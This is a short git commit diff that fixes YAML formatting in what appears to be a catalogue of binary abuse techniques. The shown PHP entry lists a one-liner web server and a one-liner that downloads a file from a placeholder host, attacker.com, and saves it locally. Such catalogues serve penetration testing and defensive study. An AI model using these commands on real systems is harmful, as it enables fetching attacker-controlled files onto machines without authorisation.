Fix YAMLs format

This commit is contained in:
Andrea Cardaci
2018-06-01 00:20:23 +02:00
parent bdf78c5e99
commit b96f6e9a49
11 changed files with 14 additions and 14 deletions

View File

@@ -35,7 +35,7 @@ functions:
php -S $LHOST:$LPORT
download:
- description: Fetch a remote file via HTTP GET request.
code: |-
code: |
export URL=http://attacker.com/file_to_get
export LFILE=where_to_save
php -r '$c=file_get_contents(getenv("URL"));file_put_contents(getenv("LFILE"), $c);'